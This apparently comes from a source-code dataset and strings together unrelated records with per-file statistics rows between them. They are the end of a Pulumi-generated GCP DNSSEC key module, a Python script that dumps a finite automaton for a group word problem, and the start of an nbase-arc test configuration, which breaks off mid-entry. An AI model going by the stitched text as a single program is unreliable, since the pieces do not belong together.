                            ("key_length", key_length),
                            ("key_tag", key_tag),
                            ("public_key", public_key)):
            pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def algorithm(self) -> str:
        """
        DNSSEC algorithm mnemonic; immutable after creation. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        """
        return pulumi.get(self, "algorithm")

    @property
    @pulumi.getter(name="creationTime")
    def creation_time(self) -> str:
        """
        Control-plane creation time, in RFC3339 text format.
        """
        return pulumi.get(self, "creation_time")

    @property
    @pulumi.getter
    def description(self) -> str:
        """
        User-supplied string of at most 1024 characters, mutable.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def digests(self) -> Sequence['outputs.GetKeysZoneSigningKeyDigestResult']:
        """
        Cryptographic hashes of the DNSKEY resource record for this DnsKey,
        needed to construct a DS record pointing at this key. Each contains:
        """
        return pulumi.get(self, "digests")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Server-defined unique identifier for the resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="isActive")
    def is_active(self) -> bool:
        """
        Whether the key signs subsequent ManagedZone changes; inactive keys
        remain published as DNSKEY records for resolvers validating existing
        signatures.
        """
        return pulumi.get(self, "is_active")

    @property
    @pulumi.getter(name="keyLength")
    def key_length(self) -> int:
        """
        Key length in bits; immutable after creation.
        """
        return pulumi.get(self, "key_length")

    @property
    @pulumi.getter(name="keyTag")
    def key_tag(self) -> int:
        """
        Non-cryptographic hash of the associated DNSKEY record, used to
        identify a DNSKEY quickly (not a unique identifier) and referenced by
        the parent zone's DS record. Range [0, 65535]; computed per RFC4034
        Appendix B.
        """
        return pulumi.get(self, "key_tag")

    @property
    @pulumi.getter(name="publicKey")
    def public_key(self) -> str:
        """
        Base64-encoded public half of this key.
        """
        return pulumi.get(self, "public_key")
@pulumi.output_type
class GetKeysZoneSigningKeyDigestResult(dict):
    def __init__(__self__, *,
                 digest: Optional[str] = None,
                 type: Optional[str] = None):
        """
        :param str digest: Base-16 encoded digest bytes, suitable for use in a DS resource record.
        :param str type: Algorithm used to compute this digest. Possible values are `sha1`, `sha256` and `sha384`
        """
        # Only store the fields that were actually supplied.
        for attr, value in (("digest", digest), ("type", type)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def digest(self) -> Optional[str]:
        """
        Base-16 encoded digest bytes, suitable for use in a DS resource record.
        """
        return pulumi.get(self, "digest")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """
        Algorithm used to compute this digest. Possible values are `sha1`, `sha256` and `sha384`
        """
        return pulumi.get(self, "type")
| 42.730853
| 455
| 0.658977
| 4,543
| 39,056
| 5.504512
| 0.077922
| 0.015396
| 0.022874
| 0.033431
| 0.829808
| 0.81985
| 0.813652
| 0.778422
| 0.776143
| 0.774143
| 0
| 0.010102
| 0.25233
| 39,056
| 913
| 456
| 42.777656
| 0.846272
| 0.397045
| 0
| 0.748515
| 1
| 0.021782
| 0.194495
| 0.077845
| 0
| 0
| 0
| 0
| 0
| 1
| 0.186139
| false
| 0
| 0.011881
| 0.00198
| 0.362376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df3bace9c584377d65079bfc44f504413f7d133a
| 24,238
|
py
|
Python
|
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
# States are 0-indexed, and state 0 is reject sink.
# Alphabet is 0-indexed.
from itertools import product
# Data copy pasted from sage output
names = ["g1", "g2", "g3", "g4", "g5", "g6", "g7", "g8", "_"]
state_labels = {
1: "_",
2: "g2",
3: "g1",
4: "g4",
5: "g3",
6: "g6",
7: "g5",
8: "g8",
9: "g7",
}
accepting_states_raw = [
[1, 1],
[2, 1],
[5, 2],
[6, 1],
[9, 3],
[12, 1],
[13, 4],
[15, 1],
[17, 5],
[18, 1],
[21, 6],
[23, 1],
[25, 7],
[28, 1],
[29, 8],
[32, 1],
[33, 9],
[40, 1],
[41, 1],
[43, 1],
[44, 1],
[46, 1],
[50, 1],
[54, 1],
[55, 1],
[58, 1],
[59, 1],
[66, 1],
[67, 1],
[69, 1],
[70, 1],
[72, 1],
[76, 1],
[80, 1],
[81, 1],
[84, 1],
[85, 1],
[88, 1],
[90, 1],
[92, 1],
[95, 1],
[98, 1],
[101, 1],
[104, 1],
]
num_states = 105
initial_state = 1
transitions_raw = [
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[19, 34]],
[[64, 35]],
[],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[24, 36]],
[[33, 37]],
[],
[[3, 38]],
[[48, 39]],
[
[1, 40],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[],
[[8, 42]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 44],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[17, 45]],
[],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[59, 47]],
[[32, 48]],
[],
[[65, 49]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[71, 50],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[56, 51]],
[],
[[43, 52]],
[[16, 53]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 54],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[],
[[49, 56]],
[[40, 57]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 58],
[44, 20],
[45, 21],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[80, 29],
],
[],
[[53, 60]],
[[48, 61]],
[[8, 62]],
[[7, 63]],
[[69, 64]],
[[64, 65]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 66],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[71, 67],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[24, 68]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 69],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 70],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[23, 71]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 72],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[13, 73]],
[[16, 74]],
[[39, 75]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 76],
[44, 20],
[45, 21],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[80, 29],
],
[[40, 77]],
[[29, 78]],
[[32, 79]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[31, 80],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 81],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[55, 82]],
[[56, 83]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 84],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 85],
[63, 29],
[65, 30],
[71, 50],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[67, 86], [72, 25]],
[[61, 24], [63, 25]],
[[71, 20], [72, 21]],
[[25, 19], [27, 21]],
[[35, 87], [80, 21]],
[[71, 31], [80, 25]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 58],
[44, 20],
[45, 21],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[80, 29],
],
[[61, 27], [79, 21]],
[
[1, 40],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[79, 33],
[80, 29],
],
[
[1, 88],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[5, 89], [9, 29]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 90],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[35, 8], [36, 9]],
[[21, 7], [27, 9]],
[[37, 91], [73, 33]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 92],
[44, 20],
[45, 21],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[80, 29],
],
[[31, 4], [36, 5]],
[[67, 30], [76, 5]],
[[31, 14], [76, 9]],
[
[11, 44],
[17, 8],
[18, 9],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 43],
[4, 4],
[9, 5],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[57, 26], [75, 25]],
[[21, 11], [75, 5]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 54],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
],
[[65, 93]],
[[17, 94]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 95],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[[43, 96]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[59, 97]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 98],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[39, 99]],
[[23, 100]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 101],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[29, 102]],
[[13, 103]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 104],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[[57, 3], [63, 5]],
[[25, 10], [79, 9]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 80],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[15, 16], [18, 17]],
[[47, 22], [74, 13]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
]
# Code written by me, and common for all data
# Invert state_labels: for each generator name, the (1-indexed) state it labels.
reversed_state_labels = [0 for _ in names]
for state in range(1, len(names) + 1):
    reversed_state_labels[names.index(state_labels[state])] = state

# Index every ordered pair of generator names in itertools.product order.
letters = {pair: index for (index, pair) in enumerate(product(names, names))}

# Densify the sparse transition table. Row 0 is the reject sink: every
# symbol keeps the automaton in state 0.
transitions = [[0 for _ in range(81)]]
for source, sparse_row in enumerate(transitions_raw):
    dense_row = []
    for symbol in range(1, 81):
        matched = False
        for entry in sparse_row:
            if entry[0] == symbol:
                matched = True
                dense_row.append(entry[1])
        if not matched:
            dense_row.append(0)
    # Final column: the current state maps back to itself (state source + 1).
    dense_row.append(source + 1)
    transitions.append(dense_row)
if __name__ == "__main__":
    # Dump the automaton in the plain-text format expected downstream:
    # alphabet size, state count, initial state, accepting-state count,
    # the label-to-letter map, per-state labels, then the transition matrix.
    print(len(names))
    # (The alphabet itself is not printed; only its size.)
    print(num_states)
    print(initial_state)
    print(len(accepting_states_raw))
    print(" ".join(str(label) for label in reversed_state_labels))
    # A positive label marks an accepting state.
    print(" ".join("{0} {1}".format(state, label) for state, label in accepting_states_raw))
    for matrix_row in transitions:
        print(" ".join(str(cell) for cell in matrix_row))
| 17.362464
| 79
| 0.238056
| 2,793
| 24,238
| 2.05299
| 0.066595
| 0.021625
| 0.029299
| 0.039065
| 0.731427
| 0.730729
| 0.72759
| 0.713987
| 0.711545
| 0.709801
| 0
| 0.412675
| 0.533212
| 24,238
| 1,395
| 80
| 17.37491
| 0.094131
| 0.01836
| 0
| 0.851095
| 0
| 0
| 0.002187
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00073
| 0
| 0.00073
| 0.005109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
df420e353d6f53b3a9de3cb1044d797558fd000c
| 9,824
|
py
|
Python
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 176
|
2015-12-30T08:44:30.000Z
|
2022-03-15T08:10:39.000Z
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 35
|
2016-03-24T08:29:51.000Z
|
2021-12-09T20:06:39.000Z
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 65
|
2015-12-30T09:05:13.000Z
|
2022-03-15T08:10:43.000Z
|
#
# Copyright 2015 Naver Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# export PATH=$ZOOKEEPER_HOME/bin:$PATH
import os
import sys
opt_use_memlog = os.path.exists("/tmp/opt_use_memlog")
sudoer = os.getenv("NBASE_ARC_TEST_SUDOER")
zookeeper_info = [
{'id':0, 'bin_dir':'$HOME/bin/zk1/bin'},
{'id':1, 'bin_dir':'$HOME/bin/zk2/bin'},
{'id':2, 'bin_dir':'$HOME/bin/zk3/bin'},
]
machines = [
{
'name' : 'localhost',
'ip' : '127.0.0.1',
'type' : 'real',
},
{
'name' : 'virtual_localhost',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.100',
'type' : 'virtual',
},
{
'name' : 'virtual_localhost1',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.101',
'type' : 'virtual',
},
{
'name' : 'vm2',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.101',
'type' : 'virtual',
},
{
'name' : 'vm3',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.102',
'type' : 'virtual',
}
]
server1 = {
'id' : 0,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
server2 = {
'id' : 1,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
server3 = {
'id' : 2,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
server4 = {
'id' : 3,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1125,
'pg_id' : 1,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
server40 = {
'id' : 3,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1125,
'pg_id' : 0,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
server5 = {
'id' : 4,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1126,
'pg_id' : 1,
'smr_base_port' : 9110,
'smr_mgmt_port' : 9113,
'gateway_port' : 9210,
'gateway_mgmt_port' : 9211,
'redis_port' : 9119,
'zk_port' : 2181,
}
server6 = {
'id' : 5,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1127,
'pg_id' : 1,
'smr_base_port' : 10110,
'smr_mgmt_port' : 10113,
'gateway_port' : 10210,
'gateway_mgmt_port' : 10211,
'redis_port' : 10119,
'zk_port' : 2181,
}
virtual_server1 = {
'id' : 0,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
virtual_server2 = {
'id' : 1,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
